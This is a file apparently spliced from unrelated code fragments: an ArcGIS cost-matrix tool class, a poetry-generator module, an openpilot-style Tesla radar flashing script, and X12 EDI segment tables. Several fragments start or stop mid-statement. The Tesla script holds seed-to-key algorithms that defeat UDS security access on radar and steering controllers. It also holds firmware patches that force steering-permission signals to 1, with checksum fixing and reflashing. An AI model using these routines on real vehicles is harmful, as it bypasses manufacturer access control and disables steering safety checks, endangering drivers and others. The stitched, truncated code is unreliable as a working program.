REMOTE_TOOL_RESTRICTIONS_PARAM_INDEX = 15
TOOL_NAME = "GenerateOriginDestinationCostMatrix_na"
HELPER_SERVICES_KEY = "asyncODCostMatrix"
def __init__(self, *args, **kwargs):
'''constructor'''
#Call the base class constructor to sets the common tool parameters as instance attributes
super(GenerateOriginDestinationCostMatrix, self).__init__(*args, **kwargs)
#Store tool parameters as instance attributes
self.origins = kwargs.get("Origins", None)
self.destinations = kwargs.get("Destinations", None)
self.timeUnits = kwargs.get("Time_Units", None)
self.distanceUnits = kwargs.get("Distance_Units", None)
self.destinationsToFind = kwargs.get("Number_of_Destinations_to_Find", None)
self.cutoff = kwargs.get("Cutoff", None)
if self.cutoff:
try:
self.cutoff = | |
rhyme))
elif not rhyme:
words = self.assemble_from_db('where stress = ? and type = ?', (stress, word_type))
else:
words = self.assemble_from_db('where stress = ? and rhyme = ? and type = ?', (stress, rhyme, word_type))
return words
def get_word_count(self, stress, rhyme=None):
if rhyme:
query_n_param = ('select count (distinct text) from word where stress = ? and rhyme = ?', (stress, rhyme))
else:
query_n_param = ('select count (distinct text) from word where stress = ?', (stress,))
logging.debug('querying : %s', query_n_param)
row = self.connection.execute(*query_n_param).fetchone()
return row[0]
def get_word_variants(self, text):
return self.assemble_from_db('where text = ?', (text.lower(),))
def known_rhyme_types(self):
for row in self.connection.execute('select distinct rhyme from word'):
yield row[0]
def __repr__(self):
return 'poetry index with {} indexed entries ({} distinct words)\n'.format(
*self.connection.execute('select count (*), count (distinct text) from word').fetchone())
class PoemPatternLearner(object):
def __init__(self, index, text):
self.index = index
self.line_type_counts = {
0: collections.Counter(),
1: collections.Counter(),
2: collections.Counter(),
3: collections.Counter(),
4: collections.Counter(),
5: collections.Counter(),
6: collections.Counter(),
7: collections.Counter(),
8: collections.Counter(),
9: collections.Counter(),
}
self.line_count = self.empty_count = self.comment_count = self.token_count = 0
for line in text:
self.process_line(line)
logging.info('parsed %s lines (skipped %s empties and %s comments) and %s tokens',
self.line_count, self.empty_count, self.comment_count, self.token_count)
@classmethod
def all_combinations(cls, list_of_iterables):
"""
recursive method for traversing lists of iterables
iterables may not be empty
yields every possible path through the list whith each path touching one element from each iterable
"""
if len(list_of_iterables) == 1:
for element in list_of_iterables[0]:
yield [element]
else:
for element in list_of_iterables[0]:
for suffix in cls.all_combinations(list_of_iterables[1:]):
yield [element] + suffix
@classmethod
def all_combinations_count(cls, list_of_iterables):
count = 1
for iterable in list_of_iterables:
count *= len(iterable)
return count
def process_line(self, line):
self.line_count += 1
if line[0] == '#':
self.comment_count += 1
return
line = line.strip()
words = re.findall('[\w\']+', line)
if not words:
self.empty_count += 1
return
logging.info('on line %d processing %d tokens: %s', self.line_count, len(words), line)
# count tokens for stats
self.token_count += len(words)
# replace each token with possible word variants
# line is a list of lists; inner lists hold word variants (sound, stress, and type variants) for each token
words = list(map(lambda token: list(self.index.get_word_variants(token)), words))
# do not proceed if a word is not known
for word_variant_list in words:
if not word_variant_list:
return
# collect word types
types = map(lambda word_variant_list: map(lambda word: word.types, word_variant_list), words)
types = map(lambda type_variants_lists: sum(type_variants_lists, list()), types)
types = list(map(set, types))
if self.all_combinations_count(types) < 1000000:
word_count = len(types) if len(types) < 10 else 0
types = self.all_combinations(types)
types = map(lambda type_combination: '-'.join(type_combination), types)
self.line_type_counts[word_count].update(types)
else:
logging.warning('too many word type combinations in line %s. skipping it as source for valid types.', line)
logging.debug('processed %d line with %d tokens: %s', self.line_count, len(words), line)
def __repr__(self):
result = ' line_patterns = {\n'
for token_count in range(1, 10):
result += ' {:d}: [ # {:d} cases\n'.format(token_count, sum(self.line_type_counts[token_count].values()))
for token_type_list, count in self.line_type_counts[token_count].most_common(20):
result += ' [\'{:s}\'], # {:d} occurrences \n'.format('\', \''.join(token_type_list.split('-')), count)
result += ' ],\n'
result += ' }\n'
return result
class Poem(object):
# collected using PoemPatternLearner
line_patterns = {
1: [ # 2 cases
['verb'], # 1 occurrences
['noun'], # 1 occurrences
],
2: [ # 54 cases
['adjective', 'noun'], # 8 occurrences
['noun', 'noun'], # 7 occurrences
['verb', 'noun'], # 7 occurrences
['noun', 'adjective'], # 3 occurrences
['adjective', 'adjective'], # 3 occurrences
['pronoun', 'noun'], # 2 occurrences
['adverb', 'noun'], # 2 occurrences
['verb', 'adjective'], # 2 occurrences
['noun', 'adverb'], # 1 occurrences
['verb', 'adverb'], # 1 occurrences
['pronoun', 'adjective'], # 1 occurrences
['determiner', 'noun'], # 1 occurrences
['pronoun', 'adverb'], # 1 occurrences
['determiner', 'adjective'], # 1 occurrences
['preposition', 'noun'], # 1 occurrences
['adjective', 'verb'], # 1 occurrences
['adverb', 'verb'], # 1 occurrences
['preposition', 'verb'], # 1 occurrences
['adverb', 'adverb'], # 1 occurrences
['postposition', 'adverb'], # 1 occurrences
],
3: [ # 1286 cases
['noun', 'noun', 'noun'], # 26 occurrences
['verb', 'noun', 'noun'], # 24 occurrences
['verb', 'adverb', 'noun'], # 23 occurrences
['verb', 'adjective', 'noun'], # 21 occurrences
['noun', 'adjective', 'noun'], # 21 occurrences
['noun', 'adverb', 'noun'], # 19 occurrences
['noun', 'noun', 'verb'], # 19 occurrences
['verb', 'noun', 'verb'], # 18 occurrences
['noun', 'adverb', 'verb'], # 17 occurrences
['noun', 'verb', 'noun'], # 17 occurrences
['verb', 'adverb', 'verb'], # 17 occurrences
['adverb', 'noun', 'noun'], # 17 occurrences
['noun', 'adjective', 'verb'], # 16 occurrences
['verb', 'determiner', 'noun'], # 16 occurrences
['adverb', 'adjective', 'noun'], # 16 occurrences
['noun', 'verb', 'verb'], # 15 occurrences
['verb', 'adjective', 'verb'], # 15 occurrences
['verb', 'verb', 'noun'], # 15 occurrences
['adverb', 'adverb', 'noun'], # 15 occurrences
['noun', 'determiner', 'noun'], # 14 occurrences
],
4: [ # 10228 cases
['noun', 'noun', 'noun', 'noun'], # 37 occurrences
['noun', 'noun', 'noun', 'verb'], # 34 occurrences
['noun', 'verb', 'noun', 'verb'], # 34 occurrences
['noun', 'verb', 'noun', 'noun'], # 33 occurrences
['noun', 'noun', 'verb', 'noun'], # 30 occurrences
['adverb', 'noun', 'noun', 'verb'], # 29 occurrences
['noun', 'verb', 'adverb', 'noun'], # 29 occurrences
['adverb', 'noun', 'noun', 'noun'], # 29 occurrences
['noun', 'noun', 'adverb', 'noun'], # 29 occurrences
['adverb', 'noun', 'verb', 'noun'], # 27 occurrences
['noun', 'verb', 'verb', 'noun'], # 27 occurrences
['adverb', 'verb', 'noun', 'verb'], # 27 occurrences
['noun', 'verb', 'adverb', 'verb'], # 27 occurrences
['verb', 'noun', 'noun', 'noun'], # 26 occurrences
['noun', 'noun', 'verb', 'verb'], # 26 occurrences
['noun', 'verb', 'verb', 'verb'], # 26 occurrences
['noun', 'adverb', 'noun', 'noun'], # 26 occurrences
['noun', 'noun', 'adverb', 'verb'], # 25 occurrences
['adverb', 'verb', 'noun', 'noun'], # 25 occurrences
['verb', 'noun', 'verb', 'noun'], # 24 occurrences
],
5: [ # 38133 cases
['adverb', 'noun', 'noun', 'noun', 'noun'], # 32 occurrences
['verb', 'noun', 'noun', 'noun', 'noun'], # 31 occurrences
['adverb', 'noun', 'noun', 'noun', 'verb'], # 28 occurrences
['noun', 'noun', 'verb', 'noun', 'noun'], # 28 occurrences
['noun', 'noun', 'noun', 'noun', 'noun'], # 27 occurrences
['adverb', 'noun', 'verb', 'noun', 'verb'], # 27 occurrences
['adverb', 'noun', 'verb', 'noun', 'noun'], # 27 occurrences
['adverb', 'noun', 'noun', 'verb', 'verb'], # 25 occurrences
['noun', 'noun', 'verb', 'noun', 'verb'], # 24 occurrences
['adverb', 'determiner', 'noun', 'noun', 'noun'], # 24 occurrences
['adverb', 'adjective', 'noun', 'noun', 'noun'], # 24 occurrences
['noun', 'verb', 'verb', 'noun', 'noun'], # 23 occurrences
['verb', 'noun', 'verb', 'noun', 'noun'], # 23 occurrences
['verb', 'noun', 'noun', 'verb', 'noun'], # 23 occurrences
['noun', 'verb', 'noun', 'noun', 'noun'], # 23 occurrences
['adverb', 'noun', 'noun', 'verb', 'noun'], # 23 occurrences
['noun', 'noun', 'noun', 'noun', 'verb'], # 23 occurrences
['verb', 'adjective', 'noun', 'noun', 'noun'], # 22 occurrences
['adverb', 'noun', 'verb', 'verb', 'verb'], # 22 occurrences
['verb', 'noun', 'verb', 'verb', 'noun'], # 22 occurrences
],
6: [ # 280978 cases
['noun', 'noun', 'noun', 'verb', 'noun', 'noun'], # 53 occurrences
['adverb', 'noun', 'noun', 'verb', 'noun', 'noun'], # 50 occurrences
['noun', 'noun', 'noun', 'verb', 'adverb', 'noun'], # 49 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', 'noun'], # 49 occurrences
['noun', 'noun', 'noun', 'verb', 'noun', 'verb'], # 47 occurrences
['adverb', 'noun', 'noun', 'noun', 'noun', 'noun'], # 46 occurrences
['adverb', 'noun', 'noun', 'verb', 'adverb', 'noun'], # 46 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', 'verb'], # 45 occurrences
['adverb', 'noun', 'noun', 'verb', 'noun', 'verb'], # 45 occurrences
['noun', 'noun', 'noun', 'verb', 'adjective', 'noun'], # 44 occurrences
['verb', 'noun', 'noun', 'verb', 'noun', 'noun'], # 44 occurrences
['noun', 'noun', 'verb', 'verb', 'noun', 'noun'], # 44 occurrences
['verb', 'noun', 'noun', 'noun', 'noun', 'noun'], # 43 occurrences
['noun', 'noun', 'noun', 'verb', 'adverb', 'verb'], # 43 occurrences
['noun', 'noun', 'noun', 'noun', 'adverb', 'noun'], # 43 occurrences
['noun', 'adverb', 'noun', 'verb', 'noun', 'noun'], # 42 occurrences
['noun', 'noun', 'noun', 'adverb', 'noun', 'noun'], # 42 occurrences
['adverb', 'adverb', 'noun', 'verb', 'noun', 'noun'], # 41 occurrences
['verb', 'noun', 'noun', 'noun', 'noun', 'verb'], # 41 occurrences
['adverb', 'noun', 'noun', 'verb', 'adverb', 'verb'], # 41 occurrences
],
7: [ # 671728 cases
['noun', 'noun', 'noun', 'noun', 'verb', 'noun', 'noun'], # 38 occurrences
['noun', 'noun', 'noun', 'noun', 'verb', 'noun', 'verb'], # 37 occurrences
['adverb', 'noun', 'noun', 'noun', 'verb', 'noun', 'noun'], # 35 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', 'noun', 'noun'], # 35 occurrences
['noun', 'noun', 'noun', 'noun', 'noun', | |
<reponame>vandreykiv/openpilot<gh_stars>0
#!/usr/bin/env python3
import argparse
import os
import sys
import struct
import binascii
from tqdm import tqdm
from enum import IntEnum
import time
from selfdrive.car.modules.CFG_module import load_bool_param
from panda import Panda
from panda.python.uds import UdsClient, MessageTimeoutError, NegativeResponseError, _negative_response_codes
from panda.python.uds import SESSION_TYPE, ACCESS_TYPE, ROUTINE_CONTROL_TYPE, ROUTINE_IDENTIFIER_TYPE, RESET_TYPE,DATA_IDENTIFIER_TYPE
# md5sum of supported (unmodified) firmware
FW_MD5SUM = "9e51ddd80606fbdaaf604c73c8dde0d1"
FW_START_ADDR = 0x7000
FW_END_ADDR = 0x45FFF
FW_SIZE = FW_END_ADDR - FW_START_ADDR + 1
BOOTLOADER_ADDR = 0x3ff7000
#tesla access codes
class ACCESS_TYPE_LEVEL_1(IntEnum):
REQUEST_SEED = 0x11
SEND_KEY = REQUEST_SEED + 1
def tesla_radar_security_access_algorithm(seeda, DEBUG=False):
# k4 = 4 bits
seed = int.from_bytes(seeda, byteorder="big")
k4 = ((seed >> 5) & 8) | ((seed >> 0xB) & 4) | ((seed >> 0x18) & 1) | ((seed >> 1) & 2)
if DEBUG:
print("k4=",hex(k4))
if DEBUG:
print("seed&0x20000=",hex(seed&0x20000))
# k32 = 32 bits
if seed & 0x20000 == 0:
k32 = (seed & ~(0xff << k4 & 0xFFFFFFFF)) << 0x20 - k4 & 0xFFFFFFFF | seed >> k4 & 0xFFFFFFFF
else:
k32 = (~(0xff << k4 & 0xFFFFFFFF) << 0x20 - k4 & seed & 0xFFFFFFFF) >> 0x20 - k4 & 0xFFFFFFFF | seed << k4 & 0xFFFFFFFF
if DEBUG:
print("k32=",hex(k32))
# k2 = 2 bits
k2 = seed >> 4 & 2 | seed >> 0x1F
if DEBUG:
print("k2=",hex(k2))
if k2 == 0:
return k32 | seed
if k2 == 1:
return k32 & seed
if k2 == 2:
return k32 ^ seed
return k32
def tesla_epas_security_access_key(seed):
key = 0xc541a9
mask = struct.unpack('<I', seed.ljust(4, b'\x00'))[0] | 0x20000000
for _i in range(32):
msb = key & 1 ^ mask & 1
mask = mask >> 1
key = key >> 1
if (msb != 0):
key = (key | msb << 0x17) ^ 0x109028
mask = 0x55f222f9
for _i in range(32):
msb = key & 1 ^ mask & 1
mask = mask >> 1
key = key >> 1
if (msb != 0):
key = (key | msb << 0x17) ^ 0x109028
key = bytes([
(key & 0xff0) >> 4,
(key & 0xf000) >> 8 | (key & 0xf00000) >> 20,
(key & 0xf0000) >> 16 | (key & 0xf) << 4,
])
return key
def wait(uds_client):
print(" wait .", end="")
prev_timeout = uds_client.timeout
uds_client.timeout = 0.1
for _ in range(10):
try:
uds_client.tester_present()
uds_client.timeout = prev_timeout
print("")
return
except MessageTimeoutError:
print(".", end="")
raise Exception("reboot failed!")
def extract_firmware(uds_client, start_addr, end_addr):
print("start extended diagnostic session ...")
uds_client.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
print("request security access seed ...")
seed = uds_client.security_access(ACCESS_TYPE.REQUEST_SEED)
print(f" seed: 0x{seed.hex()}")
print("send security access key ...")
key = tesla_radar_security_access_algorithm(seed)
print(f" key: 0x{key.hex()}")
uds_client.security_access(ACCESS_TYPE.SEND_KEY, key)
print("extract firmware ...")
print(f" start addr: {hex(start_addr)}")
print(f" end addr: {hex(end_addr)}")
fw = b""
chunk_size = 128
for addr in tqdm(range(start_addr, end_addr + 1, chunk_size)):
dat = uds_client.read_memory_by_address(addr, chunk_size)
assert len(dat) == chunk_size, f"expected {chunk_size} bytes but received {len(dat)} bytes starting at address {addr}"
fw += dat
return fw
def update_checksums(fw, offset, restore=False):
for addr in [ 0x79c0, 0x79d0 ]:
idx = addr - offset
assert idx >= 0
start = struct.unpack('<I', fw[idx:idx+4])[0]
assert start-offset >= 0
end = struct.unpack('<I', fw[idx+4:idx+8])[0]
assert start < end, f"start addr {start} not less than end addr {end}"
assert end-offset < len(fw), f"end addr {end} not inside firmware range"
crc32 = binascii.crc32(fw[start-offset:end-offset+1])
cksum = struct.pack("<I", crc32)
if not restore:
print(f" {hex(start)}-{hex(end)} : {hex(crc32)} {'(no change)' if cksum == fw[idx+8:idx+12] else '(change)'}")
fw = fw[:idx+8] + cksum + fw[idx+12:]
return fw
def patch_firmware(fw, offset, restore=False):
mods = [
# load 1 instead of extracting EPB_epasEACAllow (message must still be present on bus)
[0x031750, b"\x80\xff\x74\x2b", b"\x20\x56\x01\x00"],
# load 1 instead of extracting GTW_epasControlType (message must still be present on bus)
[0x031892, b"\x80\xff\x32\x2a", b"\x20\x56\x01\x00"],
# load 1 instead of extracting GTW_epasLDWEnable (message must still be present on bus)
[0x031974, b"\x80\xff\x50\x29", b"\x20\x56\x01\x00"],
]
for addr, old_val, new_val in mods:
idx = addr - offset
assert idx >= 0
if restore:
# undo firmware modifications (if firmware was already patched)
if fw[idx:idx+len(old_val)] != new_val:
continue
tmp_val = old_val
old_val = new_val
new_val = tmp_val
else:
# patch firmware
print(f" {hex(addr)} : 0x{fw[idx:idx+len(old_val)].hex()} -> 0x{new_val.hex()}")
assert len(old_val) == len(new_val), f"{len(old_val)} != {len(new_val)}"
assert fw[idx:idx+len(old_val)] == old_val, f"0x{fw[idx:idx+len(old_val)].hex()} != 0x{old_val.hex()}"
fw = fw[:idx] + new_val + fw[idx+len(new_val):]
return fw
def flash_bootloader(uds_client, bootloader_filename, start_addr):
print("read bootloader ...")
with open(bootloader_filename, "rb") as f:
fw = f.read()
fw_len = len(fw)
end_addr = start_addr + fw_len - 1
print("start programming session ...")
uds_client.diagnostic_session_control(SESSION_TYPE.PROGRAMMING)
wait(uds_client)
print("request security access seed ...")
seed = uds_client.security_access(ACCESS_TYPE.REQUEST_SEED)
print(f" seed: 0x{seed.hex()}")
print("send security access key ...")
key = tesla_radar_security_access_algorithm(seed)
print(f" key: 0x{key.hex()}")
uds_client.security_access(ACCESS_TYPE.SEND_KEY, key)
print("request download ...")
print(f" start addr: {hex(start_addr)}")
print(f" end addr: {hex(end_addr)}")
print(f" data length: {hex(fw_len)}")
block_size = uds_client.request_download(start_addr, fw_len)
print("transfer data ...")
print(f" block size: {block_size}")
chunk_size = block_size - 2
cnt = 0
for i in tqdm(range(0, fw_len, chunk_size)):
cnt += 1
uds_client.transfer_data(cnt & 0xFF, fw[i:i+chunk_size])
print("request transfer exit ...")
uds_client.request_transfer_exit()
print("enter bootloader ...")
uds_client.routine_control(ROUTINE_CONTROL_TYPE.START, 0x0301, struct.pack(">I", start_addr))
def flash_firmware(uds_client, fw_slice, start_addr, end_addr):
slice_len = end_addr - start_addr + 1
assert slice_len == len(fw_slice)
start_and_length = struct.pack('>II', start_addr, slice_len)
print("erase memory ...")
print(f" start addr: {hex(start_addr)}")
print(f" end addr: {hex(end_addr)}")
print(f" data length: {hex(slice_len)}")
uds_client.routine_control(ROUTINE_CONTROL_TYPE.START, ROUTINE_IDENTIFIER_TYPE.ERASE_MEMORY, start_and_length)
print("request download ...")
print(f" start addr: {hex(start_addr)}")
print(f" end addr: {hex(end_addr)}")
print(f" data length: {hex(slice_len)}")
block_size = uds_client.request_download(start_addr, slice_len)
print("transfer data ...")
print(f" block size: {block_size}")
chunk_size = block_size - 2
cnt = 0
for i in tqdm(range(0, slice_len, chunk_size)):
cnt += 1
uds_client.transfer_data(cnt & 0xFF, fw_slice[i:i+chunk_size])
print("request transfer exit ...")
uds_client.request_transfer_exit()
print("reset ...")
wait(uds_client)
try:
uds_client.ecu_reset(RESET_TYPE.HARD | 0x80)
except MessageTimeoutError:
# supress response bit set, so timeout expected
# (timeout is used to wait for reboot to complete)
pass
wait(uds_client)
print("start extended diagnostic session ...")
uds_client.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
print("request security access seed ...")
seed = uds_client.security_access(ACCESS_TYPE.REQUEST_SEED)
print(f" seed: 0x{seed.hex()}")
print("send security access key ...")
key = tesla_radar_security_access_algorithm(seed)
print(f" key: 0x{key.hex()}")
uds_client.security_access(ACCESS_TYPE.SEND_KEY, key)
print("check dependencies ...")
uds_client.routine_control(ROUTINE_CONTROL_TYPE.START, 0xDC03)
print("complete!")
def vin_learn(udcli):
print("\n[START DIAGNOSTIC SESSION]")
udcli.tester_present()
udcli.diagnostic_session_control(SESSION_TYPE.DEFAULT)
udcli.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
wait(udcli)
print("request security access seed ...")
seed = udcli.security_access(ACCESS_TYPE_LEVEL_1.REQUEST_SEED)
print(f" seed: 0x{seed.hex()}")
print("send security access key ...")
key = struct.pack("!I",tesla_radar_security_access_algorithm(seed))
udcli.security_access(ACCESS_TYPE_LEVEL_1.SEND_KEY, key)
print("Starting VIN learn...")
output = udcli.routine_control(ROUTINE_CONTROL_TYPE.START, 2563)
ns = 0
nsmax = 2
while ns < nsmax:
for i in range(3):
time.sleep(2)
try:
output = udcli.routine_control(ROUTINE_CONTROL_TYPE.STOP, 2563)
except NegativeResponseError as e:
print(('Failed to stop vin learning on attempt #{0}. ({1})').format(i + 1,_negative_response_codes[e.error_code]))
if i == 2:
raise
else:
ns += 1
if ns >= nsmax:
output = udcli.routine_control(ROUTINE_CONTROL_TYPE.REQUEST_RESULTS, 2563)
break
print("VIN learn complete! [",output,"]")
def read_values_from_radar(udcli):
print("\n[START DIAGNOSTIC SESSION]")
#udcli.tester_present()
udcli.diagnostic_session_control(SESSION_TYPE.DEFAULT)
udcli.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
print("reading VIN from radar...")
vin = udcli.read_data_by_identifier(DATA_IDENTIFIER_TYPE.VIN)
print("new VIN: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0xA022)
print("plant mode: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0xF014)
print("board part #: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0xF015)
print("board ser #: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0xFC01)
print("Active alignment horizontal angle: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0x508)
print("Active Alignment Horizontal Screw: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0x505)
print("Active Alignment State: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0xFC02)
print("Active Alignment Vertical Angle: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0x507)
print("Active Alignment Vertical Screw: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0x506)
print("Active Alignment Operation: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0x50A)
print("Service Drive Alignment State: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
vin = udcli.read_data_by_identifier(0x509)
print("Service Drive Alignment Status: {} [{}]".format(vin.decode("utf-8"), binascii.hexlify(vin)))
print("reading variables from radar...")
for i in range(0xF100, 0xF2FF):
try:
dat = udcli.read_data_by_identifier(i)
desc = ""
try:
desc = " [" + DATA_IDENTIFIER_TYPE(i).name + "]"
except ValueError:
pass
print("{}:{} {} {}".format(hex(i), desc, binascii.hexlify(dat), "")) #, dat.decode(errors="ignore")))
except NegativeResponseError as e:
if e.error_code != 0x31:
print("{}: {}".format(hex(i), e))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--extract-only', action='store_true', help='extract the firmware (do not flash)')
parser.add_argument('--extract-params', action='store_true', help='extract the programmed params from radar')
parser.add_argument('--vin-learn', action='store_true', help='switch radar in programming mode to learn VIN')
parser.add_argument('--restore', action='store_true', help='flash firmware without modification')
parser.add_argument('--debug', action='store_true', help='print additional debug messages')
parser.add_argument('--bootloader', type=str, default="./radarfw.bin", help='path to firmware file')
parser.add_argument('--can-addr', type=int, default=0x641, help='TX CAN address for UDS') #receives on 0x671, answers on 0x681 - UDS_radcRequest 1649 - RADC_udsResponse 1665
parser.add_argument('--can-bus', type=int, default=1, help='CAN bus number (zero based)')
args = parser.parse_args()
safetyParam | |
['DAD02', 'M', 1,'AN'],
['DAD03', 'M', (6,6),'DT'],
['DAD04', 'C', (6,6),'DT'],
['DAD05', 'C', (10,10),'AN'],
['DAD06', 'C', (9,9),'AN'],
['DAD07', 'C', 2,'AN'],
['DAD08', 'C', 15,'R'],
['DAD09', 'C', 30,'AN'],
['DAD10', 'C', 30,'AN'],
['DAD11', 'C', (2,2),'AN'],
['DAD12', 'C', (3,12),'AN'],
['DAD13', 'C', 35,'AN'],
['DAD14', 'C', 3,'R'],
['DAD15', 'C', 1,'AN'],
],
'DAI': [
['BOTSID', 'M', 3,'AN'],
['DAI01', 'M', 1,'AN'],
['DAI02', 'M', 6,'AN'],
['DAI03', 'C', 6,'R'],
],
'DAM': [
['BOTSID', 'M', 3,'AN'],
['DAM01', 'C', (2,2),'AN'],
['DAM02', 'C', (2,2),'AN'],
['DAM03', 'C', 15,'N2'],
['DAM04', 'C', (3,3),'AN'],
['DAM05', 'C', (2,2),'AN'],
['DAM06', 'C', (2,2),'AN'],
['DAM07', 'C', 15,'N2'],
['DAM08', 'C', (2,2),'AN'],
['DAM09', 'C', (2,2),'AN'],
['DAM10', 'C', 15,'N2'],
['DAM11', 'C', (2,2),'AN'],
['DAM12', 'C', (2,2),'AN'],
['DAM13', 'C', 15,'N2'],
['DAM14', 'C', (2,2),'AN'],
['DAM15', 'C', (2,2),'AN'],
['DAM16', 'C', 15,'N2'],
],
'DB': [
['BOTSID', 'M', 3,'AN'],
['DB01', 'M', (2,3),'AN'],
['DB02', 'M', 35,'AN'],
['DB03', 'M', 15,'R'],
['DB04', 'C', 15,'R'],
['DB05', 'C', 15,'R'],
['DB06', 'C', 1,'AN'],
],
'DD': [
['BOTSID', 'M', 3,'AN'],
['DD01', 'C', 20,'AN'],
['DD02', 'C', 3,'AN'],
['DD03', 'C', (2,2),'AN'],
['DD04', 'C', 30,'AN'],
['DD05', 'C', 20,'AN'],
['DD06', 'C', 3,'AN'],
['DD07', 'C', 15,'R'],
['DD08', 'C', 1,'AN'],
['DD09', 'C', 20,'AN'],
['DD10', 'C', 3,'AN'],
],
'DDI': [
['BOTSID', 'M', 3,'AN'],
['DDI01', 'M', 80,'AN'],
],
'DEF': [
['BOTSID', 'M', 3,'AN'],
['DEF01', 'M', 2,'AN'],
['DEF02', 'M', (2,3),'AN'],
['DEF03', 'M', 35,'AN'],
['DEF04', 'C', 2,'AN'],
],
'DEG': [
['BOTSID', 'M', 3,'AN'],
['DEG01', 'M', (3,3),'AN'],
['DEG02', 'C', (2,3),'AN'],
['DEG03', 'C', 35,'AN'],
['DEG04', 'C', 60,'AN'],
['DEG05', 'C', (3,3),'AN'],
],
'DEP': [
['BOTSID', 'M', 3,'AN'],
['DEP01', 'M', 30,'AN'],
['DEP02', 'M', (6,6),'DT'],
['DEP03', 'C', (4,8),'TM'],
['DEP04', 'C', 30,'AN'],
['DEP05', 'M', (2,2),'AN'],
['DEP06', 'M', (3,12),'AN'],
['DEP07', 'C', (2,2),'AN'],
['DEP08', 'C', 35,'AN'],
],
'DFI': [
['BOTSID', 'M', 3,'AN'],
['DFI01', 'M', (3,3),'AN'],
['DFI02', 'C', 2,'AN'],
['DFI03', 'C', 1,'AN'],
['DFI04', 'C', 1,'AN'],
],
'DG1': [
['BOTSID', 'M', 3,'AN'],
['DG101', 'M', 4,'AN'],
['DG102', 'M', 10,'AN'],
['DG103', 'M', 12,'AN'],
['DG104', 'C', 30,'AN'],
['DG105', 'M', 4,'AN'],
['DG106', 'M', (6,6),'DT'],
['DG107', 'M', (6,6),'DT'],
['DG108', 'M', 9,'N2'],
],
'DH': [
['BOTSID', 'M', 3,'AN'],
['DH01', 'M', 2,'AN'],
['DH02', 'M', (4,8),'TM'],
['DH03', 'M', (4,8),'TM'],
],
'DIS': [
['BOTSID', 'M', 3,'AN'],
['DIS01', 'M', (3,3),'AN'],
['DIS02', 'M', (2,2),'AN'],
['DIS03', 'M', 10,'R'],
['DIS04', 'M', (2,3),'AN'],
['DIS05', 'M', 10,'R'],
['DIS06', 'C', 10,'R'],
],
'DK': [
['BOTSID', 'M', 3,'AN'],
['DK01', 'M', (2,4),'AN'],
['DK02', 'M', 7,'AN'],
['DK03', 'M', 11,'AN'],
['DK04', 'M', 4,'R'],
['DK05', 'M', 1,'AN'],
['DK06', 'M', 1,'AN'],
['DK07', 'C', (6,6),'DT'],
['DK08', 'C', (6,6),'DT'],
['DK09', 'C', (2,2),'AN'],
],
'DLV': [
['BOTSID', 'M', 3,'AN'],
['DLV01', 'M', 9,'R'],
['DLV02', 'M', (2,2),'AN'],
['DLV03', 'M', 30,'AN'],
],
'DM': [
['BOTSID', 'M', 3,'AN'],
['DM01', 'M', 1,'AN'],
['DM02', 'M', (2,2),'AN'],
['DM03', 'C', 1,'AN'],
['DM04', 'C', (4,8),'TM'],
['DM05', 'M', 3,'R'],
['DM06', 'M', 2,'AN'],
['DM07', 'M', 3,'R'],
['DM08', 'M', 7,'R'],
['DM09', 'C', 2,'AN'],
['DM10', 'C', 1,'AN'],
['DM11', 'C', 1,'AN'],
['DM12', 'C', 2,'AN'],
['DM13', 'C', 3,'R'],
['DM14', 'C', 3,'R'],
['DM15', 'C', 7,'R'],
['DM16', 'C', 3,'R'],
['DM17', 'C', 7,'R'],
['DM18', 'C', 3,'R'],
['DM19', 'C', 7,'R'],
['DM20', 'C', 3,'R'],
['DM21', 'C', 7,'R'],
],
'DMA': [
['BOTSID', 'M', 3,'AN'],
['DMA01', 'C', 30,'AN'],
['DMA02', 'C', (2,2),'AN'],
['DMA03', 'C', 30,'AN'],
['DMA04', 'C', (2,2),'AN'],
['DMA05', 'C', 1,'AN'],
],
'DMG': [
['BOTSID', 'M', 3,'AN'],
['DMG01', 'C', (2,3),'AN'],
['DMG02', 'C', 35,'AN'],
['DMG03', 'C', 1,'AN'],
['DMG04', 'C', 1,'AN'],
['DMG05', 'C', 1,'AN'],
['DMG06', 'C', 2,'AN'],
['DMG07', 'C', (2,3),'AN'],
['DMG08', 'C', 2,'AN'],
],
'DMI': [
['BOTSID', 'M', 3,'AN'],
['DMI01', 'M', 1,'AN'],
['DMI02', 'M', 6,'AN'],
['DMI03', 'C', 35,'AN'],
['DMI04', 'C', 35,'AN'],
['DMI05', 'C', 35,'AN'],
['DMI06', 'C', (2,30),'AN'],
['DMI07', 'C', (2,2),'AN'],
['DMI08', 'C', (3,9),'AN'],
['DMI09', 'C', (2,3),'AN'],
['DMI10', 'C', (2,2),'AN'],
['DMI11', 'C', 80,'AN'],
['DMI12', 'C', 6,'R'],
],
'DN': [
['BOTSID', 'M', 3,'AN'],
['DN01', 'M', (2,2),'AN'],
['DN02', 'M', (6,6),'DT'],
['DN03', 'C', (3,3),'AN'],
['DN04', 'C', (3,3),'AN'],
],
'DN1': [
